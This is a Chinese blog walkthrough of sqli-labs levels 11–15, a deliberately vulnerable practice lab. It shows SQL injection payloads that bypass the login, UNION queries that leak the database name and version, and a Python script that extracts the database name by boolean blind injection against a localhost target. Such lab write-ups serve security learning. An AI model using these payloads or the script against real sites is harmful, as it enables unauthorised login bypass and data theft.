Sqli-labs11-15 （附盲注获取数据库长度和名字的脚本）

清疚 2022-06-03 10:53 228阅读 0赞

## 第十一题 报错 ##

这里写代码片

![这里写图片描述][SouthEast]

一个登陆界面

这是登陆成功  
![这里写图片描述][SouthEast 1]

用户名输入单引号报错

![这里写图片描述][SouthEast 2]

猜测是

select * from users where username='$name' and password='$password'

闭合

select * from users where username=' 'or 1=1 # ' and password='$password'

要将后面的and注释掉 不然语句就是或者 1=1并且密码等于这个了。

payload就是

username=’ or 1=1 \#  
闭合了前面对用户名的判断，注释了后面对密码的判断。使用 or 或者 1=1 肯定是对的。就可以登陆成功了。

看到页面上面有两个显示的用户名和密码的，但是还是要使用 order by测试下查询了几个数据并显示

确实是两个，order by 3的时候报错。没有第三个字段当然就不能以第三个字段排序了

![这里写图片描述][SouthEast 3]

让其回显数据，直接

![这里写图片描述][SouthEast 4]

## 第十二题 双引号报错 ##

双引号报错

这个颜色真的辣眼睛

![这里写图片描述][SouthEast 5]

根据报错信息

猜测应该是 加了括号

select \* from users where username=(“$username”) and password….

直接闭合 双引号和括号

username

")or 1=1#

![这里写图片描述][SouthEast 6]

闭合双引号和括号在 1=1注释密码~

uname=") union select database(),version()#&passwd=1

![这里写图片描述][SouthEast 7]

## 第十三题 单引号报错 ##

单引号报错

![这里写图片描述][SouthEast 8]  
闭合payload

')or 1=1 #
    
    or (substr((select database()),1,1)='s'

可以布尔盲注

payload

uname=' )or  (select substr((select database()),1,1))='s' # &passwd=1

![这里写图片描述][SouthEast 9]

写个脚本

获取数据库名长度

uname=' ) or length((select database()))=8 #&passwd=1

import requests
    #uname=' )or (select substr((select database()),1,1))='s' # &passwd=1
    url = "http://localhost/sqli-labs/Less-13/";
    name =""
    database_length=0
    #正确的话就存在 flag.jpg
    database_length_payload = "uname=' ) or length((select database()))={0} #"
    database_name_payload = "uname=' )or (select substr((select database()),{0},1))='{1}' # &passwd=1"
    def get_response(payload,value,*args):
        if len(args)==0:
            payload=payload.format(value)
            data = {
       'uname': payload, 'passwd': '1'}
        else:
            payload = payload.format(value,args[0])
            data = {
       'uname': payload, 'passwd': '1'}
        print(data)
        html = requests.post(url, data=data)
        if "flag.jpg" in html.text:
            return True
        else:
            return False
    for n in range(100):
        if get_response(database_length_payload,n):
            print("[+] database_length is {0}".format(n) )
            database_length=n
            break
    for nn in range(1,database_length+1):
        for v in "qwertyuioplkjhgfdsazxcvbnm":
            if get_response(database_name_payload,nn,v):
                name =name+v
                print("[+] database name is {0}".format(name))
                break
    print("[*] database name is {0}".format(name))

![这里写图片描述][SouthEast 10]

## 第十四题 双引号报错 ##

双引号报错

![这里写图片描述][SouthEast 11]

闭合绕过

" or 1=1 #

//写了一堆是绕过登陆的。。。。应该获取数据库信息才行~！~！！！

十四题使用十三题的去掉括号，单引号换成双引号

修改payload直接上面的脚本跑获取数据库信息

## 第十五题 单引号报错 ##

单引号报错，还是之前的脚本修改 payload

![这里写图片描述][SouthEast 12]

[SouthEast]: /images/20220603/1b8973d7844d40d09792f91be54f5d34.png
[SouthEast 1]: /images/20220603/048020f887d1425db74ace090b5606e6.png
[SouthEast 2]: /images/20220603/30514584f5ef4fdbbbfcde24aeb73a07.png
[SouthEast 3]: /images/20220603/b44a2704582f448c95c4ed0c55c7a7e6.png
[SouthEast 4]: /images/20220603/7b110c72a2c24441adfbaec8b15b259b.png
[SouthEast 5]: /images/20220603/5646be670c48469b9af707eee7819ccd.png
[SouthEast 6]: /images/20220603/91f5edc156c549b195e89d22cb895bf6.png
[SouthEast 7]: /images/20220603/88d2c1bb641647d2a4599993ffe415fc.png
[SouthEast 8]: /images/20220603/50b11bf64c724382bf46ccf0e3d85ba8.png
[SouthEast 9]: /images/20220603/c73c55c5af5440508ef1ddaecaacff6d.png
[SouthEast 10]: /images/20220603/ab0b2e38b22348838b648783fa52fd58.png
[SouthEast 11]: /images/20220603/c4e2b0073f3244019110d90bd4dc87b0.png
[SouthEast 12]: /images/20220603/50c73814d7e3458f8497afad6fca13bf.png